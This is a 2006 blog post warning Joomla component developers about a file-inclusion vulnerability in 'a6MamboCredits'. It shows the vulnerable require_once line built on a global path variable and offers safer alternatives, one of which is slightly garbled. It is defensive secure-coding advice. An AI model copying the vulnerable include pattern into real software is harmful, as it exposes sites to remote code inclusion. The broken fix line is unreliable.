I got forwarded an email yesterday about a vulnerability in the Joomla! component “a6MamboCredits”. The vulnerability was due to three things.
- Registered Globals were turned on.
- Joomla! emulates registered globals turned on.
- The global varible “mosConfig_absolute_path” was used to include files.
So the vulnerability was from code like the following:
require_once( $GLOBALS['mosConfig_absolute_path']. '/administrator/includes/pageNavigation.php' );
The solution and better programming would be to use either:
$absolute_path$mainframe->getCfg('absolute_path'); require_once($absolute_path. '/administrator/includes/pageNavigation.php' );
define( 'ABSOLUTE_PATH', dirname(__FILE__) ); require_once(ABSOLUTE_PATH. '/administrator/includes/pageNavigation.php' );
Little programming practices like this will make your components so much more secure. These vulnerabilities that keep popping up are from bad programming practices. They give Joomla! a bad name. So lets all start programming wisely.
Nonprofit news, strategy, and tactics sent straight to your inbox
Sign up for the Soapbox Engage newsletter
This entry was posted on Wednesday, August 23rd, 2006 at 10:59 am and is filed under Joomla, PHP. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.